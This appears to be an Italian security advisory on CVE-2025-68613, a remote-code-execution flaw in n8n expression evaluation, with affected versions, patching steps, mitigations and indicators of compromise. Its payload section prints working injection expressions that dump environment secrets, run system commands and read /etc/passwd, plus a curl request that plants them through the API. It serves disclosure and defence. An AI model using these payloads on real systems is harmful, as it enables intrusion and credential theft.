CVE-2025-68613: Vulnerabilità Critica n8n con CVSS 9.9

Una vulnerabilità critica è stata scoperta nella popolare piattaforma di automazione workflow n8n, con un punteggio CVSS di 9.9 su 10, classificandola come una delle minacce più gravi del 2025. La falla, identificata come CVE-2025-68613, permette a un attaccante autenticato di eseguire codice arbitrario sul server, compromettendo completamente il sistema.

Cos'è n8n e Perché È Così Diffuso

n8n è una piattaforma open-source di workflow automation che permette di automatizzare processi aziendali collegando diverse applicazioni e servizi. Con oltre 400 integrazioni native, supporto AI tramite LangChain e la possibilità di scrivere codice personalizzato, è diventato uno strumento essenziale per molte organizzazioni.

I casi d'uso più comuni includono:

• IT Operations: monitoraggio server, gestione incidenti, backup automatizzati
• Customer Support: automazione ticketing, chatbot, gestione feedback
• Marketing: campagne personalizzate, gestione social media
• ETL e Data Processing: sincronizzazione dati tra piattaforme

Secondo Censys, al 22 dicembre 2025 esistono 103.476 istanze potenzialmente vulnerabili esposte su Internet, concentrate principalmente in Stati Uniti, Germania, Francia, Brasile e Singapore.

Dettagli Tecnici della Vulnerabilità

La vulnerabilità risiede nel modo in cui n8n valuta le espressioni JavaScript all'interno dei workflow. Le espressioni racchiuse tra {{ }} vengono eseguite lato server tramite Node.js, ma senza un adeguato isolamento del contesto di esecuzione.

Il problema principale è che un attaccante può accedere all'oggetto this globale, che si risolve nell'ambiente di esecuzione Node.js. Questo permette di:

• Accedere all'oggetto process per leggere variabili d'ambiente
• Caricare moduli Node.js come child_process per eseguire comandi di sistema
• Leggere e scrivere file sul server tramite il modulo fs

Versioni Affette

La vulnerabilità colpisce le versioni di n8n dalla 0.211.0 fino alle seguenti versioni (escluse):

• 1.120.4
• 1.121.1
• 1.122.0

Esempi di Payload Malevoli

Ecco alcuni esempi di come un attaccante potrebbe sfruttare questa vulnerabilità. Nota: questi esempi sono forniti a scopo educativo per comprendere la gravità della minaccia.

Lettura delle Variabili d'Ambiente

Questo payload permette di estrarre tutte le variabili d'ambiente, incluse credenziali database, chiavi API e segreti:

{{ (function() { return this.process.env; })() }}

Esecuzione di Comandi di Sistema

Questo payload esegue il comando whoami per identificare l'utente con cui gira il processo n8n:

{{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require('child_process').execSync;
  return execSync('whoami').toString();
})() }}

Lettura di File Sensibili

Un attaccante può leggere qualsiasi file accessibile al processo n8n:

{{ (function() {
  var fs = this.process.mainModule.require('fs');
  return fs.readFileSync('/etc/passwd', 'utf8');
})() }}

Vettori di Attacco

La vulnerabilità può essere sfruttata in due modi principali:

1. Tramite l'Editor Web

1. Accedere all'editor workflow: https://n8n.example.com/workflow/new
2. Aggiungere un nodo "Set"
3. Nel campo "Value" inserire il payload malevolo
4. Eseguire il workflow tramite "Execute Node"

2. Tramite API REST

Un attaccante può creare e eseguire workflow malevoli programmaticamente:

curl -X POST https://n8n.example.com/rest/workflows \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: API_KEY" \
  -d '{
    "name": "Exploit",
    "nodes": [{
      "name": "RCE",
      "type": "n8n-nodes-base.set",
      "parameters": {
        "values": {
          "string": [{
            "name": "cmd",
            "value": "={{ (function() { return this.process.env; })() }}"
          }]
        }
      }
    }]
  }'

Impatto della Vulnerabilità

Lo sfruttamento riuscito di CVE-2025-68613 comporta:

• Remote Code Execution (RCE): esecuzione di comandi arbitrari sul server
• Compromissione completa del sistema: accesso a tutti i file e processi
• Furto di credenziali: accesso a database, API keys, token di autenticazione
• Manipolazione dei workflow: modifica di automazioni esistenti per scopi malevoli
• Movimento laterale: utilizzo del server compromesso per attaccare altri sistemi

Come Proteggere la Tua Istanza n8n

1. Aggiornamento Immediato (Priorità Massima)

La soluzione definitiva è aggiornare n8n a una delle versioni patchate:

• v1.120.4 o superiore
• v1.121.1 o superiore
• v1.122.0 o superiore (raccomandato)

Per aggiornare con Docker:

docker pull n8nio/n8n:latest
docker stop n8n
docker rm n8n
docker run -d --name n8n -p 5678:5678 n8nio/n8n:latest

Per aggiornare con npm:

npm update -g n8n

2. Mitigazioni Temporanee

Se non è possibile aggiornare immediatamente, implementare queste misure:

• Limitare i permessi di editing: consentire la creazione e modifica di workflow solo a utenti fidati
• Disabilitare la registrazione pubblica: impedire a nuovi utenti di registrarsi autonomamente
• Hardening dell'ambiente: eseguire n8n con privilegi minimi e accesso di rete limitato
• Audit dei workflow esistenti: verificare che non contengano payload sospetti

3. Indicatori di Compromissione (IoC)

Controllare i workflow per la presenza di pattern sospetti:

• Espressioni contenenti this.process
• Riferimenti a mainModule.require
• Utilizzo di moduli come child_process o fs
• Pattern IIFE (Immediately Invoked Function Expression) non giustificati

Timeline della Disclosure

• 19 Dicembre 2025: Divulgazione pubblica della vulnerabilità
• 19 Dicembre 2025: Rilascio delle patch da parte di n8n
• 22 Dicembre 2025: Pubblicazione di Proof-of-Concept da parte di ricercatori di sicurezza

Conclusione

La vulnerabilità CVE-2025-68613 rappresenta una minaccia seria per chiunque utilizzi n8n in produzione. Con un punteggio CVSS di 9.9 e oltre 100.000 istanze potenzialmente vulnerabili, è fondamentale agire immediatamente.

Se utilizzi n8n, aggiorna subito alla versione 1.122.0 o superiore. Non sottovalutare questa vulnerabilità: richiede solo un account con privilegi bassi per essere sfruttata, e le conseguenze possono essere devastanti.

Per le organizzazioni che gestiscono dati sensibili o critici, consigliamo inoltre di effettuare un audit completo dei workflow esistenti e di implementare un sistema di monitoraggio per rilevare attività sospette.